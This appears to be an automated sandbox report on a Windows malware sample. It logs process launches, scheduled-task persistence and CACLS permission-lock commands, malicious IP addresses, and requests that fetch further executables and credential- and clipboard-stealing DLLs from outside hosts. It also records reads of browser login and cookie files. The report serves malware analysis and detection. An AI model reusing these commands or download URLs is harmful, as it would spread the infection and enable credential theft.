Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Feb. 19, 2023, 2:01 p.m. | Feb. 19, 2023, 2:04 p.m. |
Process | PID | Command line |
---|---|---|
iWr34lU.exe | 2228 | `C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe` |
kQu23BE.exe | 2684 | `C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe` |
leW63TH.exe | 2728 | `C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe` |
AppLaunch.exe | 3044 | `"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"` |
schtasks.exe | 296 | `"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F` |
cmd.exe | 2596 | `"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y\|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit` |
cmd.exe | 2224 | `C:\Windows\system32\cmd.exe /S /D /c" echo Y"` |
cacls.exe | 524 | `CACLS "mnolyk.exe" /P "test22:N"` |
cacls.exe | 2672 | `CACLS "mnolyk.exe" /P "test22:R" /E` |
cmd.exe | 2852 | `C:\Windows\system32\cmd.exe /S /D /c" echo Y"` |
cacls.exe | 2924 | `CACLS "..\4f9dd6f8a7" /P "test22:N"` |
cacls.exe | 2972 | `CACLS "..\4f9dd6f8a7" /P "test22:R" /E` |
dNZ51dd.exe | 2288 | `C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dNZ51dd.exe` |
eTh66Ma.exe | 3160 | `C:\Users\test22\AppData\Local\Temp\IXP003.TMP\eTh66Ma.exe` |
kFw24bl.exe | 3204 | `C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kFw24bl.exe` |
nBU16dI.exe | 3472 | `C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nBU16dI.exe` |
schtasks.exe | 2096 | `"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F` |
cmd.exe | 1340 | `"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y\|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit` |
cmd.exe | 3000 | `C:\Windows\system32\cmd.exe /S /D /c" echo Y"` |
cacls.exe | 2872 | `CACLS "nbveek.exe" /P "test22:N"` |
cacls.exe | 2124 | `CACLS "nbveek.exe" /P "test22:R" /E` |
cmd.exe | 3032 | `C:\Windows\system32\cmd.exe /S /D /c" echo Y"` |
cacls.exe | 2360 | `CACLS "..\9e0894bcc4" /P "test22:N"` |
cacls.exe | 2608 | `CACLS "..\9e0894bcc4" /P "test22:R" /E` |
agent.exe | 2704 | `"C:\Users\test22\AppData\Roaming\1000239000\agent.exe"` |
Underglaze.exe | 2976 | `C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe` |
rundll32.exe | 3768 | `"C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main` |
rundll32.exe | 3812 | `"C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main` |
rundll32.exe | 3852 | `"C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main` |
rundll32.exe | 3688 | `"C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main` |
Name | Response | Post-Analysis Lookup |
---|---|---|
transfer.sh | 144.76.136.153 | |
IP Address | Status | Action |
---|---|---|
144.76.136.153 | Active | Moloch |
164.124.101.2 | Active | Moloch |
176.113.115.17 | Active | Moloch |
193.233.20.15 | Active | Moloch |
193.233.20.16 | Active | Moloch |
193.233.20.17 | Active | Moloch |
45.32.218.145 | Active | Moloch |
62.204.41.245 | Active | Moloch |
62.204.41.88 | Active | Moloch |
79.110.62.167 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
Field | Value |
---|---|
pdb_path | wextract.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe |
resource name | AVI |
Suspicious features | Suspicious request |
---|---|
POST method with no referer header, POST method with no useragent header, Connection to IP address | POST http://193.233.20.15/dF30Hn4m/index.php |
GET method with no useragent header, Connection to IP address | GET http://193.233.20.16/ti/truno.exe |
GET method with no useragent header, Connection to IP address | GET http://62.204.41.245/lebro.exe |
POST method with no referer header, POST method with no useragent header, Connection to IP address | POST http://62.204.41.88/9vdVVVjsw/index.php |
GET method with no useragent header, Connection to IP address | GET http://79.110.62.167/link/agent.exe |
GET method with no useragent header, Connection to IP address | GET http://62.204.41.88/lend/Underglaze.exe |
GET method with no useragent header, Connection to IP address | GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll |
GET method with no useragent header, Connection to IP address | GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll |
GET method with no useragent header, Connection to IP address | GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll |
GET method with no useragent header, Connection to IP address | GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll |
Field | Value |
---|---|
request | POST http://193.233.20.15/dF30Hn4m/index.php |
request | GET http://193.233.20.16/ti/truno.exe |
request | GET http://62.204.41.245/lebro.exe |
request | POST http://62.204.41.88/9vdVVVjsw/index.php |
request | GET http://79.110.62.167/link/agent.exe |
request | GET http://62.204.41.88/lend/Underglaze.exe |
request | GET http://193.233.20.15/dF30Hn4m/Plugins/cred64.dll |
request | GET http://193.233.20.15/dF30Hn4m/Plugins/clip64.dll |
request | GET http://62.204.41.88/9vdVVVjsw/Plugins/cred64.dll |
request | GET http://62.204.41.88/9vdVVVjsw/Plugins/clip64.dll |
request | POST http://193.233.20.15/dF30Hn4m/index.php |
request | POST http://62.204.41.88/9vdVVVjsw/index.php |
description | nbveek.exe tried to sleep 128 seconds, actually delayed analysis time by 128 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\kFw24bl.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\leW63TH.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\sCf07ZB.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\dNZ51dd.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\nJM68XE.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\sLP46se.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nXi14fa28.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\rtJ58hE.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\iWr34lU.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP002.TMP\nRK04uJ07.exe |
file | C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\slV42BL.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Roaming\1000239000\agent.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\eTh66Ma.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\nBU16dI.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP003.TMP\kQu23BE.exe |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y\|CACLS "..\9e0894bcc4" /P "test22:N"&&CACLS "..\9e0894bcc4" /P "test22:R" /E&&Exit |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "test22:N"&&CACLS "mnolyk.exe" /P "test22:R" /E&&echo Y\|CACLS "..\4f9dd6f8a7" /P "test22:N"&&CACLS "..\4f9dd6f8a7" /P "test22:R" /E&&Exit |
file | C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe |
file | C:\Users\test22\AppData\Roaming\1000239000\agent.exe |
file | C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe |
file | C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe |
file | C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\1000004001\lebro.exe |
file | C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll |
file | C:\Users\test22\AppData\Roaming\1000239000\agent.exe |
file | C:\Users\test22\AppData\Local\Temp\1000245001\Underglaze.exe |